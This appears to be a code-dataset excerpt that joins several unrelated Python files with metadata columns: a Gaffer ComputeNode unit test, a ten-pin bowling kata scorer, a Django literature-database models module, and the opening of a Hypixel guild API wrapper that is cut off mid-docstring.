] | null | null | null | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import time
import IECore
import Gaffer
import GafferTest
class ComputeNodeTest( GafferTest.TestCase ) :
def testOperation( self ) :
n1 = GafferTest.AddNode()
n1["sum"].getValue()
dirtiedPlugs = GafferTest.CapturingSlot( n1.plugDirtiedSignal() )
setPlugs = GafferTest.CapturingSlot( n1.plugSetSignal() )
n1["op1"].setValue( 2 )
self.assertEqual( len( setPlugs ), 1 )
self.assertEqual( len( dirtiedPlugs ), 2 )
self.assertEqual( setPlugs[0][0].fullName(), "AddNode.op1" )
self.assertEqual( dirtiedPlugs[0][0].fullName(), "AddNode.op1" )
self.assertEqual( dirtiedPlugs[1][0].fullName(), "AddNode.sum" )
n1["op2"].setValue( 3 )
self.assertEqual( len( setPlugs ), 2 )
self.assertEqual( setPlugs[1][0].fullName(), "AddNode.op2" )
del dirtiedPlugs[:]
del setPlugs[:]
# plug set or dirty signals are not emitted during computation
self.assertEqual( n1.getChild("sum").getValue(), 5 )
self.assertEqual( len( setPlugs ), 0 )
self.assertEqual( len( dirtiedPlugs ), 0 )
# connect another add node onto the output of this one
n2 = GafferTest.AddNode( "Add2" )
dirtiedPlugs2 = GafferTest.CapturingSlot( n2.plugDirtiedSignal() )
setPlugs2 = GafferTest.CapturingSlot( n2.plugSetSignal() )
n2["op1"].setInput( n1["sum"] )
# connecting a plug doesn't set the value of the input plug
# immediately - the value is transferred only upon request.
self.assertEqual( len( setPlugs2 ), 0 )
self.assertEqual( len( dirtiedPlugs2 ), 2 )
self.assertEqual( dirtiedPlugs2[0][0].fullName(), "Add2.op1" )
self.assertEqual( dirtiedPlugs2[1][0].fullName(), "Add2.sum" )
del dirtiedPlugs2[:]
del setPlugs2[:]
self.assertEqual( n2["op1"].getValue(), 5 )
self.assertEqual( n2["sum"].getValue(), 5 )
# plug set or dirty signals are not emitted during computation
self.assertEqual( len( setPlugs2 ), 0 )
self.assertEqual( len( dirtiedPlugs2 ), 0 )
	def testDirtyOfInputsWithConnections( self ) :
		"""Making a connection dirties the destination's input and output, and
		an upstream setValue() dirties the whole downstream chain in order."""
		n1 = GafferTest.AddNode( "n1" )
		n2 = GafferTest.AddNode( "n2" )
		dirtied = GafferTest.CapturingSlot( n1.plugDirtiedSignal(), n2.plugDirtiedSignal() )
		n2["op1"].setInput( n1["sum"] )
		self.assertEqual( len( dirtied ), 2 )
		self.failUnless( dirtied[0][0].isSame( n2["op1"] ) )
		self.failUnless( dirtied[1][0].isSame( n2["sum"] ) )
		del dirtied[:]
		n1["op1"].setValue( 10 )
		self.assertEqual( len( dirtied ), 4 )
		self.failUnless( dirtied[0][0].isSame( n1["op1"] ) )
		self.failUnless( dirtied[1][0].isSame( n1["sum"] ) )
		self.failUnless( dirtied[2][0].isSame( n2["op1"] ) )
		self.failUnless( dirtied[3][0].isSame( n2["sum"] ) )
		self.assertEqual( n2.getChild( "sum" ).getValue(), 10 )
	def testDirtyPlugComputesSameValueAsBefore( self ) :
		"""Recomputing after dirtying yields the correct value even when it
		happens to equal the previously computed one (1 + -1 == 0 twice)."""
		n1 = GafferTest.AddNode( "N1" )
		n2 = GafferTest.AddNode( "N2" )
		n2.getChild( "op1" ).setInput( n1.getChild( "sum" ) )
		n1.getChild( "op1" ).setValue( 1 )
		n1.getChild( "op2" ).setValue( -1 )
		self.assertEqual( n2.getChild( "sum" ).getValue(), 0 )
	def testOutputsDirtyForNewNodes( self ) :
		"""A freshly constructed node computes from its current inputs (its
		output starts dirty rather than stuck on a stale default)."""
		n = GafferTest.AddNode()
		n["op1"].setValue( 1 )
		n["op2"].setValue( 2 )
		self.assertEqual( n["sum"].getValue(), 3 )
def testComputeInContext( self ) :
n = GafferTest.FrameNode()
# With no explicit Context active, the value reflects the default frame.
self.assertEqual( n["output"].getValue(), 1 )
c = Gaffer.Context()
c.setFrame( 10 )
# Inside a Context block, computes must see that Context's frame.
with c :
self.assertEqual( n["output"].getValue(), 10 )
def testComputeInThreads( self ) :

	"""Concurrent computes with per-thread Contexts must each see their
	own frame value.

	Assertion errors raised inside worker threads do not fail a unittest
	by themselves, so failures are collected and re-raised in the main
	thread after all workers have joined.
	"""

	n = GafferTest.FrameNode()

	failures = []

	def f( frame ) :
		try :
			c = Gaffer.Context()
			c.setFrame( frame )
			with c :
				time.sleep( 0.01 )
				self.assertEqual( n["output"].getValue(), frame )
		except Exception as e :
			failures.append( e )

	threads = []
	for i in range( 0, 1000 ) :
		t = threading.Thread( target = f, args = ( i, ) )
		t.start()
		threads.append( t )

	for t in threads :
		t.join()

	# Surface any assertion error that occurred in a worker thread.
	if failures :
		raise failures[0]
def testDirtyNotPropagatedDuringCompute( self ) :
n1 = GafferTest.AddNode( "n1" )
n2 = GafferTest.AddNode( "n2" )
n1["op1"].setValue( 2 )
n1["op2"].setValue( 3 )
n2["op1"].setInput( n1["sum"] )
dirtyCapturer = GafferTest.CapturingSlot( n2.plugDirtiedSignal() )
self.assertEqual( n2["sum"].getValue(), 5 )
# Computing a value must not emit any plugDirtied signals.
self.assertEqual( len( dirtyCapturer ), 0 )
def testWrongPlugSet( self ) :
# Computing out1 on BadNode must raise a RuntimeError.
n = GafferTest.BadNode()
self.assertRaises( RuntimeError, n["out1"].getValue )
def testPlugNotSet( self ) :
# Computing out3 on BadNode must also raise a RuntimeError.
n = GafferTest.BadNode()
self.assertRaises( RuntimeError, n["out3"].getValue )
def testHash( self ) :
# Validate plug hashes for a C++-implemented node.
n = GafferTest.MultiplyNode()
self.assertHashesValid( n )
def testHashForPythonDerivedClasses( self ) :
# Validate plug hashes for a Python-derived node as well.
n = GafferTest.AddNode()
self.assertHashesValid( n )
def testDisableCaching( self ) :

	"""Clearing the Cacheable flag must force a fresh computation on every
	getValue() call instead of returning the cached object."""

	n = GafferTest.CachingTestNode()

	n["in"].setValue( "d" )

	v1 = n["out"].getValue( _copy=False )
	v2 = n["out"].getValue( _copy=False )

	self.assertEqual( v1, v2 )
	self.assertEqual( v1, IECore.StringData( "d" ) )

	# the objects should be one and the same, as the second computation
	# should have shortcut and returned a cached result.
	# assertTrue replaces the deprecated failUnless alias.
	self.assertTrue( v1.isSame( v2 ) )

	n["out"].setFlags( Gaffer.Plug.Flags.Cacheable, False )
	v3 = n["out"].getValue( _copy=False )
	self.assertEqual( v3, IECore.StringData( "d" ) )
	self.assertEqual( v3, v1 )

	# we disabled caching, so the two values should
	# be distinct objects, even though they are equal.
	# assertFalse replaces the deprecated failIf alias.
	self.assertFalse( v3.isSame( v1 ) )
def testConnectedPlugsShareHashesAndCacheEntries( self ) :

	"""Directly connected ObjectPlugs must share hashes and cache entries,
	while a connection that performs type conversion (float to int) must
	not."""

	class Out( Gaffer.ComputeNode ) :

		def __init__( self, name="Out" ) :

			Gaffer.ComputeNode.__init__( self, name )
			self.addChild( Gaffer.ObjectPlug( "oOut", Gaffer.Plug.Direction.Out, IECore.NullObject() ) )
			self.addChild( Gaffer.FloatPlug( "fOut", Gaffer.Plug.Direction.Out ) )

		def affects( self, input ) :

			return []

		def hash( self, output, context, h ) :

			h.append( context.getFrame() )

		def compute( self, plug, context ) :

			if plug.getName() == "oOut" :
				plug.setValue( IECore.IntData( int( context.getFrame() ) ) )
			else :
				plug.setValue( context.getFrame() )

	IECore.registerRunTimeTyped( Out )

	class In( Gaffer.ComputeNode ) :

		def __init__( self, name="In" ) :

			Gaffer.ComputeNode.__init__( self, name )
			self.addChild( Gaffer.ObjectPlug( "oIn", Gaffer.Plug.Direction.In, IECore.NullObject() ) )
			self.addChild( Gaffer.IntPlug( "iIn", Gaffer.Plug.Direction.In ) )

	IECore.registerRunTimeTyped( In )

	nOut = Out()
	nIn = In()

	nIn["oIn"].setInput( nOut["oOut"] )
	nIn["iIn"].setInput( nOut["fOut"] )

	for i in range( 0, 1000 ) :

		c = Gaffer.Context()
		c.setFrame( i )
		with c :

			# because oIn and oOut are connected, they should
			# have the same hash and share the exact same value.
			self.assertEqual( nIn["oIn"].getValue(), IECore.IntData( i ) )
			self.assertEqual( nOut["oOut"].getValue(), IECore.IntData( i ) )
			self.assertEqual( nIn["oIn"].hash(), nOut["oOut"].hash() )
			# assertTrue replaces the deprecated failUnless alias.
			self.assertTrue( nIn["oIn"].getValue( _copy=False ).isSame( nOut["oOut"].getValue( _copy=False ) ) )

			# even though iIn and fOut are connected, they should have
			# different hashes and different values, because type conversion
			# (float to int) is performed when connecting them.
			self.assertEqual( nIn["iIn"].getValue(), i )
			self.assertEqual( nOut["fOut"].getValue(), float( i ) )
			self.assertNotEqual( nIn["iIn"].hash(), nOut["fOut"].hash() )
class PassThrough( Gaffer.ComputeNode ) :

	"""A ComputeNode whose "out" plug forwards the value of "in" unchanged,
	sharing the upstream hash so cache entries are reused."""

	def __init__( self, name="PassThrough", inputs={}, dynamicPlugs=() ) :

		Gaffer.ComputeNode.__init__( self, name )

		self.addChild( Gaffer.ObjectPlug( "in", Gaffer.Plug.Direction.In, IECore.NullObject() ) )
		self.addChild( Gaffer.ObjectPlug( "out", Gaffer.Plug.Direction.Out, IECore.NullObject() ) )

	def affects( self, input ) :

		# Only "in" influences "out"; nothing else affects anything.
		return [ self["out"] ] if input.isSame( self["in"] ) else []

	def hash( self, output, context, h ) :

		assert( output.isSame( self["out"] ) )

		# by assigning directly to the hash rather than appending,
		# we signify that we'll pass through the value unchanged.
		h.copyFrom( self["in"].hash() )

	def compute( self, plug, context ) :

		assert( plug.isSame( self["out"] ) )
		plug.setValue( self["in"].getValue( _copy=False ), _copy=False )

IECore.registerRunTimeTyped( PassThrough )
def testPassThroughSharesHashes( self ) :
n = self.PassThrough()
n["in"].setValue( IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ) )
# PassThrough copies the input hash verbatim, so in and out must match.
self.assertEqual( n["in"].hash(), n["out"].hash() )
self.assertEqual( n["in"].getValue(), n["out"].getValue() )
def testPassThroughSharesCacheEntries( self ) :

	"""A pass-through that shares hashes should also share cache entries,
	so both plugs return the very same object."""

	n = self.PassThrough()
	n["in"].setValue( IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ) )

	# this fails because TypedObjectPlug::setValue() currently does a copy. i think we can
	# optimise things by allowing a copy-free setValue() function for use during computations.
	# assertTrue replaces the deprecated failUnless alias.
	self.assertTrue( n["in"].getValue( _copy=False ).isSame( n["out"].getValue( _copy=False ) ) )
def testInternalConnections( self ) :
a = GafferTest.AddNode()
a["op1"].setValue( 10 )
n = Gaffer.Node()
n["in"] = Gaffer.IntPlug()
n["out"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
# An internal in->out connection should forward both value and hash.
n["out"].setInput( n["in"] )
n["in"].setInput( a["sum"] )
self.assertEqual( n["out"].getValue(), a["sum"].getValue() )
self.assertEqual( n["out"].hash(), a["sum"].hash() )
if __name__ == "__main__":
# Allow running this test file directly as a script.
unittest.main()
| 30.989276 | 107 | 0.652479 |
f687a40b299c1ba79ff792e3f3dfcad30aaba5cf | 1,418 | py | Python | software_testing/exercises/exercise5/kata_bowling.py | rafaelleinio/software-testing | 0cb9e95b65675121360a0e47ad127666c6c5ae7d | [
"MIT"
] | 1 | 2021-02-28T02:12:35.000Z | 2021-02-28T02:12:35.000Z | software_testing/exercises/exercise5/kata_bowling.py | rafaelleinio/software-testing | 0cb9e95b65675121360a0e47ad127666c6c5ae7d | [
"MIT"
] | null | null | null | software_testing/exercises/exercise5/kata_bowling.py | rafaelleinio/software-testing | 0cb9e95b65675121360a0e47ad127666c6c5ae7d | [
"MIT"
] | null | null | null | from __future__ import annotations
from typing import List, Optional
class KataBowling:
    """Immutable scorer for the ten-pin bowling kata.

    Each :meth:`roll` returns a *new* instance with the extra roll appended,
    so a game can be built fluently; :attr:`score` evaluates the ten frames
    with the usual strike/spare bonus rules.
    """

    def __init__(self, rolls: Optional[List[int]] = None):
        # The annotation previously claimed ``List[int]`` while defaulting to
        # None; ``Optional`` states the actual contract.
        self.rolls = rolls if rolls else []

    def roll(self, round_score: int) -> "KataBowling":
        """Return a new game with ``round_score`` pins recorded as the next roll."""
        return KataBowling(rolls=self.rolls + [round_score])

    @property
    def score(self) -> int:
        """Total score over ten frames, applying strike and spare bonuses."""
        total = 0
        roll_index = 0
        for _frame in range(10):
            if self._is_strike(roll_index):
                total += 10 + self._strike_bonus(roll_index)
                roll_index += 1  # a strike consumes a single roll
            elif self._is_spare(roll_index):
                total += 10 + self._spare_bonus(roll_index)
                roll_index += 2
            else:
                total += self._normal_frame(roll_index)
                roll_index += 2
        return total

    def _get_roll_score(self, i: int) -> int:
        # Unthrown rolls count as zero so partial games can always be scored.
        return self.rolls[i] if i < len(self.rolls) else 0

    def _is_strike(self, i: int) -> bool:
        return self._get_roll_score(i) == 10

    def _is_spare(self, i: int) -> bool:
        return self._get_roll_score(i) + self._get_roll_score(i + 1) == 10

    def _strike_bonus(self, i: int) -> int:
        # The next two rolls after a strike count double.
        return self._get_roll_score(i + 1) + self._get_roll_score(i + 2)

    def _spare_bonus(self, i: int) -> int:
        # The first roll of the following frame counts double.
        return self._get_roll_score(i + 2)

    def _normal_frame(self, i: int) -> int:
        return self._get_roll_score(i) + self._get_roll_score(i + 1)
| 30.826087 | 74 | 0.594499 |
b814468ae521cb1f61fc8db1f361d2a3eabbcc73 | 16,680 | py | Python | items/models.py | kgdunn/Django-app-Literature-database | d21358c9da6d470885a576a8944e4aa35a01ba7e | [
"BSD-2-Clause"
] | null | null | null | items/models.py | kgdunn/Django-app-Literature-database | d21358c9da6d470885a576a8944e4aa35a01ba7e | [
"BSD-2-Clause"
] | null | null | null | items/models.py | kgdunn/Django-app-Literature-database | d21358c9da6d470885a576a8944e4aa35a01ba7e | [
"BSD-2-Clause"
] | null | null | null | from django.db import models
from django.contrib import admin
from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
from utils import unique_slugify
# Standard library imports
import re
import unicodedata
# Custom manager for the items
class LatestItemManager(models.Manager):
    """Manager that serves items newest-first: ``Item.latest_items.all()``."""

    def get_queryset(self):
        # Order by creation timestamp, most recent first.
        base = super().get_queryset()
        return base.order_by('-date_created')

    def get_latest(self, n=5):
        """Return the ``n`` most recently created items."""
        return self.get_queryset()[:n]
class Author(models.Model):
    # Personal-name fields; ``slug`` is derived from the full name on save.
    first_name = models.CharField(max_length=255)
    middle_initials = models.CharField(max_length=31, blank=True, null=True)
    last_name = models.CharField(max_length=255)
    slug = models.SlugField(max_length=510, editable=False)
    class Meta:
        ordering = ['last_name']
    def __str__(self):
        # "Last, First M." form; initials only when present.
        if self.middle_initials:
            return '%s, %s %s' % (self.last_name, self.first_name,
                                  self.middle_initials)
        else:
            return '%s, %s' % (self.last_name, self.first_name)
    @property
    def full_name(self):
        # "First M. Last" form.
        if self.middle_initials:
            return u'%s %s %s' % (self.first_name, self.middle_initials,
                                  self.last_name)
        else:
            return u'%s %s' % (self.first_name, self.last_name)
    @property
    def full_name_hyperlinked(self):
        # NOTE(review): identical to ``full_name`` — no hyperlink markup is
        # actually produced here; confirm whether that is intentional.
        if self.middle_initials:
            return u'%s %s %s' % (self.first_name, self.middle_initials,
                                  self.last_name)
        else:
            return u'%s %s' % (self.first_name, self.last_name)
    def get_absolute_url(self):
        """ Create a URL to display all publications by this author
        """
        return reverse('lit-show-items', kwargs={'what_view': 'author',
                                                 'extra_info': self.slug})
    def save(self, *args, **kwargs):
        """
        http://docs.djangoproject.com/en/dev/topics/db/models/
        overriding-predefined-model-methods
        """
        # Normalize whitespace and refresh the unique slug before saving.
        self.first_name = self.first_name.strip()
        self.last_name = self.last_name.strip()
        unique_slugify(self, self.full_name, 'slug')
        super(Author, self).save(*args, **kwargs)
class AuthorGroup(models.Model):
    """ Ensures the author order is correctly added """
    # Through-model for Item.authors; ``order`` preserves author position.
    author = models.ForeignKey(Author)
    item = models.ForeignKey('Item')
    order = models.IntegerField(default=0)
class School(models.Model):
    # Institution granting a thesis; ``slug`` is derived from ``name``.
    name = models.CharField(max_length=255)
    slug = models.SlugField(max_length=255, editable=False)
    def __str__(self):
        return self.name
    def save(self, *args, **kwargs):
        """
        http://docs.djangoproject.com/en/dev/topics/db/models/
        overriding-predefined-model-methods
        """
        # Trim whitespace and regenerate the slug on every save.
        self.name = self.name.strip()
        self.slug = slugify(self.name)
        super(School, self).save(*args, **kwargs)
class Journal(models.Model):
    # A journal publications appear in; ``slug`` is derived from ``name``.
    name = models.CharField(max_length=510)
    website = models.URLField()
    slug = models.SlugField(max_length=510, editable=False)
    def __str__(self):
        return self.name
    def get_absolute_url(self):
        """
        Create a URL to display all publications from this journal
        """
        return reverse('lit-show-items', kwargs={'what_view': 'journal',
                                                 'extra_info': self.slug})
    @property
    def as_url(self):
        # HTML anchor pointing at this journal's listing page.
        return '<a href="%s">%s</a>' % (self.get_absolute_url(), self.name)
    def save(self, *args, **kwargs):
        """
        http://docs.djangoproject.com/en/dev/topics/db/models/
        overriding-predefined-model-methods
        """
        # Trim whitespace and regenerate the slug on every save.
        self.name = self.name.strip()
        self.slug = slugify(str(self))
        super(Journal, self).save(*args, **kwargs)
class Publisher(models.Model):
    # Publishing house for books and conference proceedings.
    name = models.CharField(max_length=510)
    slug = models.SlugField(max_length=510, editable=False)
    def __str__(self):
        return self.name
    def save(self, *args, **kwargs):
        """
        http://docs.djangoproject.com/en/dev/topics/db/models/
        overriding-predefined-model-methods
        """
        # Trim whitespace and regenerate the slug on every save.
        self.name = self.name.strip()
        self.slug = slugify(str(self))
        super(Publisher, self).save(*args, **kwargs)
class Item(models.Model):
    """Base model for a literature item (thesis, paper, book, proceeding)."""

    objects = models.Manager()  # The default manager: 'Item.objects.all()'
    latest_items = LatestItemManager()  # 'Item.latest_items.all()'

    ITEM_CHOICES = (
        ('thesis', 'Thesis'),
        ('journalpub', 'Journal publication'),
        ('book', 'Book'),
        ('conferenceproc', 'Conference proceeding'),
    )

    def upload_dest(instance, filename):
        """Build the PDF storage path; used as the ``upload_to`` callback.

        ``instance.slug`` has already been defined at this point (from
        self.save()), so it can be safely used.
        """
        return 'literature/pdf/%s/%s.pdf' % (instance.slug[0], instance.slug)

    authors = models.ManyToManyField(Author, through='AuthorGroup')
    title = models.TextField()
    slug = models.SlugField(max_length=255, editable=False)
    item_type = models.CharField(max_length=20, choices=ITEM_CHOICES)
    year = models.PositiveIntegerField()
    doi_link = models.URLField(blank=True, null=True,
                               verbose_name='DOI link')
    web_link = models.URLField(blank=True, null=True, )
    tags = models.ManyToManyField('tagging.Tag')
    abstract = models.TextField(blank=True)
    show_abstract = models.BooleanField(default=False)
    date_created = models.DateTimeField(editable=False, auto_now=True)
    pdf_file = models.FileField(upload_to=upload_dest, max_length=255,
                                blank=True, null=True, verbose_name='PDF file')

    # This PDF should never be shown because it contains personal notes or is
    # not authorized for distribution.
    private_pdf = models.BooleanField(default=False,
                                      verbose_name='Private PDF')

    # If ``private_pdf`` is False and this field is True, and there actually
    # exists a PDF, then show the PDF available for download. Usually set
    # True for theses. If ``private_pdf`` is True, then this still will not
    # show the download.
    can_show_pdf = models.BooleanField(default=False,
                                       verbose_name='Can show PDF')

    # Contains unstructured text (auto-extracted from PDF, cut/paste,
    # whatever) to improve the user's search.
    other_search_text = models.TextField(null=True, blank=True)

    def __str__(self):
        if self.doi_link:
            return '%s (%s) [doi:%s]' % (self.title, str(self.year),
                                         self.doi_link)
        return '%s (%s)' % (self.title, str(self.year))

    @property
    def has_extra(self):
        """True when extra searchable text is attached to this item."""
        return bool(self.other_search_text)

    @property
    def year_as_url(self):
        """The publication year, hyperlinked to the per-year listing."""
        return '<a href="%s">%s</a>' % (reverse('lit-show-items',
                                        kwargs={'what_view': 'pub-by-year',
                                                'extra_info': self.year}),
                                        self.year)

    @property
    def external_link_text(self):
        """ Text to display for the external link """
        if self.doi_link:
            return 'DOI'
        elif self.web_link:
            return 'More info'
        else:
            return ''

    @property
    def external_link(self):
        """ Hyperlink to use for the external link """
        if self.doi_link:
            return self.doi_link
        elif self.web_link:
            return self.web_link
        else:
            return None

    @property
    def author_list(self):
        """Abbreviated author listing:

        1: Duncan
        2: Smith and Weston
        3: Joyce et al.
        """
        auth_list = self.authors.all().order_by('authorgroup__order')
        if len(auth_list) > 2:
            return auth_list[0].last_name + ' <i>et al</i>.'
        elif len(auth_list) == 2:
            return ' and '.join([auth.last_name for auth in auth_list])
        elif len(auth_list) == 1:
            return auth_list[0].last_name
        # Guard against items saved without authors (previously IndexError).
        return ''

    @property
    def author_slugs(self):
        """
        Used to create the PDF file name. Doesn't matter if there are spaces
        in the last name (i.e. it is not a strict slug), but it does ensure
        the last names only contain normalized unicode characters.

        1: Duncan
        2: Smith-and-Weston
        3: Joyce-Smith-Smythe
        """
        auth_list = self.authors.all().order_by('authorgroup__order')
        authors = []
        for auth in auth_list:
            # NFKD-normalize, drop non-ASCII bytes, and decode back to str.
            # (The old code left this as ``bytes`` and then called the
            # Python 2-only ``unicode()`` builtin — a NameError on Python 3.)
            author = unicodedata.normalize('NFKD', auth.last_name)
            author = author.encode('ascii', 'ignore').decode('ascii')
            author = re.sub(r'[^\w\s-]', '', author).strip()
            authors.append(author)

        if len(auth_list) >= 3:
            out = ', '.join([auth for auth in authors[0:-1]])
            out += ' and ' + authors[-1]
            return out
        elif len(auth_list) == 2:
            return ' and '.join(authors)
        elif authors:
            return authors[0]
        return ''

    @property
    def author_list_all_lastnames(self):
        """Hyperlinked author last names in full:

        1: Duncan
        2: Smith and Weston
        3: Joyce, Smith and Smythe
        """
        auth_list = list(self.authors.all().order_by('authorgroup__order'))

        def urlize(author):
            return '<a href="%s">%s</a>' % (author.get_absolute_url(),
                                            author.last_name)

        out = ''
        if len(auth_list) >= 3:
            out = ', '.join([urlize(auth) for auth in auth_list[0:-1]])
            out += ' and ' + urlize(auth_list[-1])
        if len(auth_list) == 2:
            out = ' and '.join([urlize(auth) for auth in auth_list])
        if len(auth_list) == 1:
            out = urlize(auth_list[0])
        return out

    @property
    def full_author_listing(self):
        """Hyperlinked author names in full:

        1: Duncan
        2: John R. Smith and P. Q. Weston
        3: R. W. Joyce, P. J. Smith and T. Y. Smythe
        """
        auth_list = list(self.authors.all().order_by('authorgroup__order'))

        def urlize(author):
            return '<a href="%s">%s</a>' % (author.get_absolute_url(),
                                            author.full_name)

        out = ''
        if len(auth_list) >= 3:
            out = ', '.join([urlize(auth) for auth in auth_list[0:-1]])
            out += ' and ' + urlize(auth_list[-1])
        if len(auth_list) == 2:
            out = ' and '.join([urlize(auth) for auth in auth_list])
        if len(auth_list) == 1:
            out = urlize(auth_list[0])
        return out

    @property
    def doi_link_cleaned(self):
        """DOI with the resolver prefix removed.

        ``str.lstrip`` strips a *character set*, not a prefix, so the old
        ``lstrip('http://dx.doi.org/')`` could also eat leading characters
        of the DOI itself; remove the exact prefix instead.
        """
        prefix = 'http://dx.doi.org/'
        if self.doi_link and self.doi_link.startswith(prefix):
            return self.doi_link[len(prefix):]
        return self.doi_link

    @property
    def previous_item(self):
        # NOTE: assumes primary keys are contiguous; gaps from deleted items
        # yield None here.
        n = 1
        item = Item.objects.all().filter(pk=self.pk-n)
        if len(item):
            return item[0].get_absolute_url()
        else:
            return None

    @property
    def next_item(self):
        # NOTE: assumes primary keys are contiguous; see ``previous_item``.
        n = 1
        item = Item.objects.all().filter(pk=self.pk+n)
        if len(item):
            return item[0].get_absolute_url()
        else:
            return None

    def get_absolute_url(self):
        """ I can't seem to find a way to use the "reverse" or "permalink"
        functions to create this URL: do it manually, to match ``urls.py``
        """
        return reverse('lit-view-item', args=[0]).rstrip('0') + \
            '%d/%s' % (self.pk, self.slug)

    def save(self, *args, **kwargs):
        """Trim the title and (re)generate a unique slug before saving."""
        self.title = self.title.strip()
        unique_slugify(self, self.title[0:255], 'slug')
        super(Item, self).save(*args, **kwargs)
class JournalPub(Item):
    # A journal article; extends Item with journal, volume and page range.
    journal = models.ForeignKey(Journal)
    volume = models.CharField(max_length=100, blank=True, null=True)
    page_start = models.CharField(max_length=10, blank=True, null=True)
    page_end = models.CharField(max_length=10, blank=True, null=True)
    def __str__(self):
        # NOTE(review): unlike Item.__str__, this always appends the DOI, so
        # items without one render "[doi:None]" — confirm intent.
        return '%s (%s) [doi:%s]' % (self.title, str(self.year),
                                     self.doi_link)
    def full_citation(self):
        """
        Returns details about the journal publication in HTML form
        """
        return u'%s: "%s", <i>%s</i>, <b>%s</b>, %s-%s, %s.' %\
            (self.author_list,
             self.title,
             self.journal.as_url,
             self.volume,
             self.page_start,
             self.page_end,
             self.year_as_url)
    class Meta:
        verbose_name_plural = "journal publications"
class Book(Item):
    """A published book, optionally part of a series or a specific edition."""

    publisher = models.ForeignKey(Publisher)
    editors = models.ManyToManyField(Author, blank=True)
    volume = models.CharField(max_length=100, blank=True, null=True)
    series = models.CharField(max_length=100, blank=True, null=True)
    edition = models.CharField(max_length=100, blank=True, null=True)
    isbn = models.CharField(max_length=20, blank=True, null=True,
                            verbose_name='ISBN')

    def full_citation(self):
        """
        Returns details about the book in HTML form.
        """
        if self.edition:
            # The old code dereferenced ``self.edition`` before the None
            # check, and used ``rstrip('edition')``, which strips a
            # character *set* (e.g. "revised" -> "revis"); remove the
            # suffix word explicitly instead.
            edition = self.edition.lower()
            if edition.endswith('edition'):
                edition = edition[:-len('edition')].rstrip()
            return '%s: "<i>%s</i>", %s, %s, %s.' % (self.full_author_listing,
                                                     self.title,
                                                     edition,
                                                     self.publisher,
                                                     self.year_as_url)
        return '%s: "<i>%s</i>", %s, %s.' % (self.author_list,
                                             self.title,
                                             self.publisher,
                                             self.year_as_url)
class ConferenceProceeding(Item):
    """A paper published in conference proceedings."""

    editors = models.ManyToManyField(Author, blank=True)
    conference_name = models.CharField(max_length=255, blank=True, null=True)
    page_start = models.CharField(max_length=10, blank=True, null=True)
    page_end = models.CharField(max_length=10, blank=True, null=True)
    organization = models.CharField(blank=True, null=True, max_length=200)
    location = models.CharField(blank=True, null=True, max_length=200)
    publisher = models.ForeignKey(Publisher, blank=True, null=True)

    def full_citation(self):
        """
        Returns details about the conference in HTML form.
        """
        first = '%s: "<i>%s</i>", ' % (self.author_list, self.title)
        # Coerce each part to str before joining: ``publisher`` is a model
        # instance and ``str.join`` raises TypeError on non-string items.
        rest = ', '.join(str(item) for item in [self.conference_name,
                                                self.organization,
                                                self.location,
                                                self.publisher] if item)
        final = ', %s.' % self.year
        if self.page_start and self.page_end:
            final = ', %s-%s, %s.' % (self.page_start, self.page_end,
                                      self.year)
        elif self.page_start:
            final = ', %s, %s.' % (self.page_start, self.year)
        return first + rest + final

    class Meta:
        verbose_name_plural = "conference proceedings"
class Thesis(Item):
    """A Masters or Ph.D thesis granted by a School."""

    THESIS_CHOICES = (
        ('masters', 'Masters thesis'),
        ('phd', 'Ph.D thesis'),
    )
    thesis_type = models.CharField(max_length=50, choices=THESIS_CHOICES)
    school = models.ForeignKey(School)
    supervisors = models.ManyToManyField(Author, blank=True)

    def full_citation(self):
        """
        Returns details about the thesis in HTML form
        """
        # Map the stored choice key to its human-readable label ('' if the
        # key is not a known choice).
        label = dict(self.THESIS_CHOICES).get(self.thesis_type, '')
        return '%s: "<i>%s</i>", %s, %s, %s.' % (self.author_list,
                                                 self.title,
                                                 label,
                                                 self.school,
                                                 self.year_as_url)

    class Meta:
        verbose_name_plural = "theses"
| 34.391753 | 83 | 0.547062 |
8d58aee32f2fbb8d3fd4aa72064c7c346bdea0a0 | 2,590 | py | Python | hypixel/guild.py | SomePr0grammer/aHypixel | 35a2db37fe780bfd31bc116796ea850c98d219d6 | [
"MIT"
] | null | null | null | hypixel/guild.py | SomePr0grammer/aHypixel | 35a2db37fe780bfd31bc116796ea850c98d219d6 | [
"MIT"
] | null | null | null | hypixel/guild.py | SomePr0grammer/aHypixel | 35a2db37fe780bfd31bc116796ea850c98d219d6 | [
"MIT"
] | null | null | null | from .errors import *
from .player import Player
import aiohttp
class Guild:
    """Wrapper around the Hypixel guild API endpoint.

    Parameters:
        key: Hypixel API key.
